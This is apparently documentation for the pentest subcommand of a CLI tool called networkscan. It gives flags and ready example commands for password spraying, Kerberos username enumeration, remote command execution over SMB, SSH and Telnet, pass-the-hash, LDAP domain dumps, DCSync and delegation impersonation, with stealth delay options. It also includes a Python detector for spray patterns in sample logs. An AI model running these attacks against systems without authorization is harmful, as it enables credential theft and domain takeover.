Pentest#

The networkscan pentest command provides comprehensive penetration testing capabilities against network services, including credential spraying and service-specific attacks.

Usage#

networkscan pentest [command]

Commands#

Spray Commands#

The spray commands perform credential spraying attacks and username enumeration against network services.

Password Spray#

Perform password spraying attacks against specified targets and services.

Usage#

networkscan pentest spray password --targets 192.168.1.100:445 --service SMB --usernames admin,user --passwords Password123,123456

Supported Services#
  • SSH - Secure Shell protocol
  • SMB - Server Message Block protocol
  • TELNET - Telnet protocol
  • FTP - File Transfer Protocol
  • LDAP - Lightweight Directory Access Protocol
  • KERBEROS - Kerberos authentication protocol
Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (required)
  • --usernames / -u - Usernames to spray
  • --passwords / -p - Passwords to spray
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --password-lists - Built-in password lists (SYSTEM_PASSWORDS, DOMAIN_PASSWORDS, SERVICE_PASSWORDS)
  • --domain / -d - Domain for SMB/LDAP/KERBEROS authentication
  • --ntlm-hashes - NTLM hashes for pass-the-hash authentication (32 hex chars each)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between password attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --stop-on-first-success - Stop after first successful authentication
  • --successful-only - Only show successful authentications in output

Username Spray#

Perform username enumeration against specified targets and services.

Usage#

networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --usernames admin,guest

Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (currently only KERBEROS supported) (required)
  • --domain / -d - Domain for Kerberos authentication (required)
  • --usernames / -u - Usernames to enumerate
  • --username-file - File containing usernames (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --username-scheme - Generate usernames using scheme (FLAST, FIRST_DOT_LAST, FIRSTLAST, LASTFIRST, FIRST, LAST, F_LAST, FIRST_LAST)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between username attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --successful-only - Only show successful username enumerations in output
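
The spray commands above produce a characteristic pattern on the target side: many distinct accounts failing from one source with only one or two attempts each, rather than many attempts against one account. As an added example that is not part of the networkscan documentation or code, the following Python flags that fan-out pattern over constructed sshd-style failure lines; the log format, thresholds and window size are assumptions to be tuned for your environment.

```python
"""Flag password-spray style fan-out in authentication failures (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample lines (not real data): 10.0.0.5 touches six accounts once
# each within seconds (spray); 10.0.0.9 hammers one account (brute force).
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd: Failed password for admin from 10.0.0.5 port 40001
2024-05-01T10:00:03 sshd: Failed password for guest from 10.0.0.5 port 40002
2024-05-01T10:00:05 sshd: Failed password for backup from 10.0.0.5 port 40003
2024-05-01T10:00:07 sshd: Failed password for svc_sql from 10.0.0.5 port 40004
2024-05-01T10:00:09 sshd: Failed password for alice from 10.0.0.5 port 40005
2024-05-01T10:00:11 sshd: Failed password for bob from 10.0.0.5 port 40006
2024-05-01T10:01:00 sshd: Failed password for alice from 10.0.0.9 port 50001
2024-05-01T10:01:05 sshd: Failed password for alice from 10.0.0.9 port 50002
2024-05-01T10:01:10 sshd: Failed password for alice from 10.0.0.9 port 50003
2024-05-01T10:01:15 sshd: Failed password for alice from 10.0.0.9 port 50004
"""

# Assumed line layout: ISO timestamp, then the classic sshd failure message.
LINE_RE = re.compile(r"^(\S+) sshd: Failed password for (?:invalid user )?(\S+) from (\S+) port")

def parse_failures(text):
    """Yield (timestamp, username, source_ip) for each failed-auth line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)

def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Return {source_ip: sorted usernames} for every source whose failures inside
    one sliding `window` cover >= `min_users` accounts with <= `max_per_user`
    attempts each. Brute force against a single account does not match."""
    by_src = defaultdict(list)
    for ts, user, src in events:
        by_src[src].append((ts, user))
    hits = {}
    for src, evs in by_src.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide window forward
                start += 1
            counts = defaultdict(int)
            for _, user in evs[start:end + 1]:
                counts[user] += 1
            if len(counts) >= min_users and max(counts.values()) <= max_per_user:
                hits[src] = sorted({u for _, u in evs})   # report all accounts touched
                break
    return hits
```

A spray run with --sleep and --jitter spreads attempts out, so the detection window must be longer than the per-attempt delay an operator could choose; correlating on the account set rather than the attempt rate is what keeps the check meaningful.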

Service Commands#

The service commands perform service-specific penetration testing operations against network services.

SMB#

Perform pentest operations against SMB services including authentication testing, command execution, share enumeration, and file downloads.

Usage#

networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin,user --passwords password,123456 --actions AUTHENTICATE,SHARE_ENUM

Available Actions#

Use the --actions flag to specify what operations to perform. Base enumeration is always performed.

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform (see available actions)
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --remote-file-path - Remote file path to download (format: SHARE\path\to\file)
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results

SSH#

Perform pentest operations against SSH services including authentication testing, command execution, and file transfers.

Usage#

networkscan pentest service ssh --targets 192.168.1.100:22 --usernames root,admin --passwords password,123456 --actions AUTHENTICATE,EXECUTE

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --key-file - SSH private key file
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --upload - Files to upload (local:remote format)
  • --download - Remote files to download
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results

Telnet#

Perform pentest operations against Telnet services including authentication testing and command execution.

Usage#

networkscan pentest service telnet --targets 192.168.1.100:23 --usernames admin --passwords password --actions AUTHENTICATE,EXECUTE

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results

LDAP#

Perform pentest operations against LDAP services including authentication testing and domain enumeration.

Usage#

networkscan pentest service ldap --targets 192.168.1.10:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions AUTHENTICATE,DOMAINDUMP

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
  • --sleep - Delay in seconds between LDAP queries for stealth mode
  • --jitter - Jitter percentage (0-100) to randomize sleep delays
  • --max-queries - Maximum total LDAP queries to perform (0 = unlimited)
  • --minimal-queries - Use minimal query sets and essential attributes only

MSRPC#

Perform pentest operations against MS-RPC services including DCSync attacks via DRSUAPI.

Usage#

networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC

Key Flags#
  • --targets - Target hosts (required)
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --kerberos-ticket - Base64-encoded Kerberos ticket (TGS) for ticket-based authentication
  • --domain - Domain name (required for DCSync)
  • --actions - Actions to perform: DCSYNC (required)
  • --timeout - Connection timeout in seconds (default: 10)

Kerberos#

Perform pentest operations against Kerberos services including advanced attacks such as constrained delegation.

Usage#

networkscan pentest service kerberos --targets dc.example.com:88 --usernames user --passwords pass --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/server.example.com

Key Flags#
  • --targets - Target domain controllers (DC.domain.com:88) (required)
  • --actions - Actions to perform: SERVICE_TICKET
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for user
  • --ntlm-hash - NTLM hash for user authentication
  • --domain / -d - Domain name
  • --spn - Target Service Principal Name (e.g., HTTP/server.domain.com)
  • --impersonate - Target user to impersonate (optional, for delegation attacks)
  • --timeout - Connection timeout in milliseconds (default: 5000)

Examples#

Basic Authentication Testing#

# Test SMB authentication with domain
networkscan pentest service smb --targets server.domain.com:445 --usernames admin --passwords Password123 --domain CORP --actions AUTHENTICATE

# Test SSH with key-based auth
networkscan pentest service ssh --targets 192.168.1.10:22 --usernames root --key-file ~/.ssh/id_rsa --actions AUTHENTICATE,EXECUTE --execute "whoami"

# Test Telnet with wordlists
networkscan pentest service telnet --targets 192.168.1.20:23 --username-file users.txt --password-file passwords.txt --actions AUTHENTICATE

Password Spraying#

# SMB password spray
networkscan pentest spray password --targets 192.168.1.0/24 --service SMB --usernames admin,guest --passwords Password123,123456 --domain CORP

# Kerberos username enumeration
networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --username-lists DOMAIN_USERNAMES

# LDAP password spray with stealth
networkscan pentest spray password --targets ldap.example.com:389 --service LDAP --usernames user1,user2 --passwords pass1,pass2 --domain EXAMPLE --sleep 2 --jitter 10

Advanced Usage#

# SMB with file download
networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin --passwords password --remote-file-path "C$\\Windows\\System32\\drivers\\etc\\hosts"

# LDAP domain dump with stealth
networkscan pentest service ldap --targets dc.example.com:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions DOMAINDUMP --sleep 1 --minimal-queries

# Kerberos service ticket with impersonation
networkscan pentest service kerberos --targets dc.example.com:88 --usernames service_account --passwords ServicePass123 --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/webapp.example.com --impersonate administrator

# DCSync attack
networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC